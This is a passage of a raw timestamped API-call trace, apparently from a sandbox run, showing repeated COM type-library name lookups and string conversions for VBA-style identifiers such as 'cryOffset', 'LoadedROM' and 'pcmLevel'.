pBstrLibName=0x2e2eb0) returned 0x0 [0045.565] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.565] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4984b0 [0045.565] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_LoadedROM") returned 0x10d403 [0045.565] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x11, _Src="_B_var_LoadedROM" | out: _Dst="_B_var_LoadedROM") returned 0x0 [0045.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=17, lpWideCharStr=0x2e3060, cchWideChar=17 | out: lpWideCharStr="_B_var_LoadedROM") returned 17 [0045.565] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.565] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_LoadedROM", lHashVal=0x10d403, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.565] IUnknown:Release (This=0x782a220) returned 0x22 [0045.565] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.565] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_LoadedROM", lHashVal=0x10d403, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.565] IUnknown:Release (This=0x731da90) returned 0x15 [0045.565] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.565] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_LoadedROM", lHashVal=0x10d403, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.565] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.565] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.565] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_LoadedROM", lHashVal=0x10d403, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.565] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.565] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.565] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_LoadedROM", lHashVal=0x10d403, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.565] IUnknown:Release (This=0x782b300) returned 0x6 [0045.565] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.565] IUnknown:Release (This=0x782a220) returned 0x22 [0045.566] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.566] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cryOffset") returned 0x10f7e8 [0045.566] strcpy_s (in: _Dst=0x2e3060, _DstSize=0xa, _Src="cryOffset" | out: _Dst="cryOffset") returned 0x0 [0045.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=10, lpWideCharStr=0x2e2eb0, cchWideChar=10 | out: lpWideCharStr="cryOffset") returned 10 [0045.566] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.566] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="cryOffset", lHashVal=0x10f7e8, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.566] IUnknown:Release (This=0x782a220) returned 0x22 [0045.566] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.566] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="cryOffset", lHashVal=0x10f7e8, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.566] IUnknown:Release (This=0x731da90) returned 0x15 [0045.566] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.566] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="cryOffset", lHashVal=0x10f7e8, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.566] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.566] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.566] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="cryOffset", lHashVal=0x10f7e8, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.566] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.566] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4984b0 [0045.566] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cryOffset") returned 0x1000ee [0045.566] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x11, _Src="_B_var_cryOffset" | out: _Dst="_B_var_cryOffset") returned 0x0 [0045.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=17, lpWideCharStr=0x2e3060, cchWideChar=17 | out: lpWideCharStr="_B_var_cryOffset") returned 17 [0045.566] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.566] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_cryOffset", lHashVal=0x1000ee, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.566] IUnknown:Release (This=0x782a220) returned 0x22 [0045.566] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.566] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_cryOffset", lHashVal=0x1000ee, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.566] IUnknown:Release (This=0x731da90) returned 0x15 [0045.566] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.566] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_cryOffset", lHashVal=0x1000ee, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.566] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.566] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.566] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_cryOffset", lHashVal=0x1000ee, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.566] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.566] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.566] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_cryOffset", lHashVal=0x1000ee, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.566] IUnknown:Release (This=0x782b300) returned 0x6 [0045.566] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.566] IUnknown:Release (This=0x782a220) returned 0x22 [0045.566] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.567] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rea") returned 0x10ce02 [0045.567] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x4, _Src="Rea" | out: _Dst="Rea") returned 0x0 [0045.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=4, lpWideCharStr=0x2e2eb0, cchWideChar=4 | out: lpWideCharStr="Rea") returned 4 [0045.567] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.567] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Rea", lHashVal=0x10ce02, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.567] IUnknown:Release (This=0x782a220) returned 0x22 [0045.567] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.567] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Rea", lHashVal=0x10ce02, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.567] IUnknown:Release (This=0x731da90) returned 0x15 [0045.567] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.567] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Rea", lHashVal=0x10ce02, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.567] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.567] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.567] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Rea", lHashVal=0x10ce02, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.567] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.567] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb4984b0 [0045.567] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Rea") returned 0x108b13 [0045.567] strcpy_s (in: _Dst=0x2e3210, _DstSize=0xb, _Src="_B_var_Rea" | out: _Dst="_B_var_Rea") returned 0x0 [0045.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=11, lpWideCharStr=0x2e3060, cchWideChar=11 | out: lpWideCharStr="_B_var_Rea") returned 11 [0045.567] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.567] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Rea", lHashVal=0x108b13, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.567] IUnknown:Release (This=0x782a220) returned 0x22 [0045.567] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.567] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Rea", lHashVal=0x108b13, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.567] IUnknown:Release (This=0x731da90) returned 0x15 [0045.567] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.567] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Rea", lHashVal=0x108b13, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.567] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.567] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.567] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Rea", lHashVal=0x108b13, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.567] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.567] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.567] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Rea", lHashVal=0x108b13, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.567] IUnknown:Release (This=0x782b300) returned 0x6 [0045.567] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.567] IUnknown:Release (This=0x782a220) returned 0x22 [0045.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a504fa, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="dHEX") returned 0 [0045.567] wcscpy_s (in: _Destination=0xb64bf90, _SizeInWords=0x5, _Source="dHEX" | out: _Destination="dHEX") returned 0x0 [0045.567] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.568] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByteTo") returned 0x10975d [0045.568] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x7, _Src="ByteTo" | out: _Dst="ByteTo") returned 0x0 [0045.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=7, lpWideCharStr=0x2e2eb0, cchWideChar=7 | out: lpWideCharStr="ByteTo") returned 7 [0045.568] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.568] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="ByteTo", lHashVal=0x10975d, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.568] IUnknown:Release (This=0x782a220) returned 0x22 [0045.568] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.568] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="ByteTo", lHashVal=0x10975d, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.568] IUnknown:Release (This=0x731da90) returned 0x15 [0045.568] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.568] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="ByteTo", lHashVal=0x10975d, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.568] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.568] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.568] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="ByteTo", lHashVal=0x10975d, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.568] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.568] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb4984b0 [0045.568] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ByteTo") returned 0x1011c7 [0045.568] strcpy_s (in: _Dst=0x2e3210, _DstSize=0xe, _Src="_B_var_ByteTo" | out: _Dst="_B_var_ByteTo") returned 0x0 [0045.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=14, lpWideCharStr=0x2e3060, cchWideChar=14 | out: lpWideCharStr="_B_var_ByteTo") returned 14 [0045.568] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.568] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_ByteTo", lHashVal=0x1011c7, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.568] IUnknown:Release (This=0x782a220) returned 0x22 [0045.568] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.568] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_ByteTo", lHashVal=0x1011c7, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.568] IUnknown:Release (This=0x731da90) returned 0x15 [0045.568] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.568] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_ByteTo", lHashVal=0x1011c7, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.568] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.568] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.568] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_ByteTo", lHashVal=0x1011c7, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.568] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.568] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.568] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_ByteTo", lHashVal=0x1011c7, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.568] IUnknown:Release (This=0x782b300) returned 0x6 [0045.568] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.568] IUnknown:Release (This=0x782a220) returned 0x22 [0045.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a504aa, cbMultiByte=11, lpWideCharStr=0x2e2f20, cchWideChar=10 | out: lpWideCharStr="SignedInt") returned 0 [0045.568] wcscpy_s (in: _Destination=0xb64bfa8, _SizeInWords=0xa, _Source="SignedInt" | out: _Destination="SignedInt") returned 0x0 [0045.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5045a, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="Data") returned 0 [0045.568] wcscpy_s (in: _Destination=0xb64bfc8, _SizeInWords=0x5, _Source="Data" | out: _Destination="Data") returned 0x0 [0045.569] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.569] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.569] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alignment") returned 0x1049a4 [0045.569] strcpy_s (in: _Dst=0x2e3060, _DstSize=0xa, _Src="Alignment" | out: _Dst="Alignment") returned 0x0 [0045.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=10, lpWideCharStr=0x2e2eb0, cchWideChar=10 | out: lpWideCharStr="Alignment") returned 10 [0045.569] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.569] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Alignment", lHashVal=0x1049a4, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.569] IUnknown:Release (This=0x782a220) returned 0x22 [0045.569] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.569] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Alignment", lHashVal=0x1049a4, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=1, pBstrLibName=0x2e2eb0) returned 0x0 [0045.569] IUnknown:Release (This=0x731da90) returned 0x15 [0045.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Alignment", cchWideChar=-1, lpMultiByteStr=0x2e3060, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Alignment", lpUsedDefaultChar=0x0) returned 10 [0045.569] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alignment") returned 0x1049a4 [0045.569] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4984b0 [0045.569] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Alignment") returned 0x1052e9 [0045.569] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x11, _Src="_B_var_Alignment" | out: _Dst="_B_var_Alignment") returned 0x0 [0045.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=17, lpWideCharStr=0x2e3060, cchWideChar=17 | out: lpWideCharStr="_B_var_Alignment") returned 17 [0045.569] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.569] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Alignment", lHashVal=0x1052e9, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.569] IUnknown:Release (This=0x782a220) returned 0x22 [0045.569] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.569] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Alignment", lHashVal=0x1052e9, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.569] IUnknown:Release (This=0x731da90) returned 0x15 [0045.569] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.569] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Alignment", lHashVal=0x1052e9, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.569] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.569] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.569] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Alignment", lHashVal=0x1052e9, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.569] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.569] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.569] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Alignment", lHashVal=0x1052e9, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.569] IUnknown:Release (This=0x782b300) returned 0x6 [0045.569] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.569] IUnknown:Release (This=0x782a220) returned 0x22 [0045.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb51446c, cbMultiByte=2, lpWideCharStr=0xa512e36, cchWideChar=6 | out: lpWideCharStr="&H") returned 2 [0045.570] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.570] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0045.570] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x9, _Src="offtrack" | out: _Dst="offtrack") returned 0x0 [0045.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=9, lpWideCharStr=0x2e2eb0, cchWideChar=9 | out: lpWideCharStr="offtrack") returned 9 [0045.570] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.570] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="offtrack", lHashVal=0x100c71, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.570] IUnknown:Release (This=0x782a220) returned 0x22 [0045.570] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.570] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="offtrack", lHashVal=0x100c71, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.570] IUnknown:Release (This=0x731da90) returned 0x15 [0045.570] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.570] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="offtrack", lHashVal=0x100c71, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.570] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.570] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.570] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="offtrack", lHashVal=0x100c71, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.570] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.570] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4984b0 [0045.570] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_offtrack") returned 0x10e439 [0045.570] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x10, _Src="_B_var_offtrack" | out: _Dst="_B_var_offtrack") returned 0x0 [0045.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=16, lpWideCharStr=0x2e3060, cchWideChar=16 | out: lpWideCharStr="_B_var_offtrack") returned 16 [0045.570] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.570] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_offtrack", lHashVal=0x10e439, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.570] IUnknown:Release (This=0x782a220) returned 0x22 [0045.570] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.570] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_offtrack", lHashVal=0x10e439, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.570] IUnknown:Release (This=0x731da90) returned 0x15 [0045.570] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.570] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_offtrack", lHashVal=0x10e439, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.570] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.570] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.570] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_offtrack", lHashVal=0x10e439, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.570] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.570] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.570] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_offtrack", lHashVal=0x10e439, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.570] IUnknown:Release (This=0x782b300) returned 0x6 [0045.570] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.570] IUnknown:Release (This=0x782a220) returned 0x22 [0045.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a504fa, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="dHEX") returned 0 [0045.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a504aa, cbMultiByte=11, lpWideCharStr=0x2e2f20, cchWideChar=10 | out: lpWideCharStr="SignedInt") returned 0 [0045.571] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.571] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.571] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pcmLevel") returned 0x10cc0a [0045.571] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x9, _Src="pcmLevel" | out: _Dst="pcmLevel") returned 0x0 [0045.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=9, lpWideCharStr=0x2e2eb0, cchWideChar=9 | out: lpWideCharStr="pcmLevel") returned 9 [0045.571] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.571] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="pcmLevel", lHashVal=0x10cc0a, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.571] IUnknown:Release (This=0x782a220) returned 0x22 [0045.571] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.571] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="pcmLevel", lHashVal=0x10cc0a, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.571] IUnknown:Release (This=0x731da90) returned 0x15 [0045.571] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.571] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="pcmLevel", lHashVal=0x10cc0a, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.571] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.571] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.571] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="pcmLevel", lHashVal=0x10cc0a, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.571] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.571] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4984b0 [0045.571] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pcmLevel") returned 0x10a393 [0045.571] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x10, 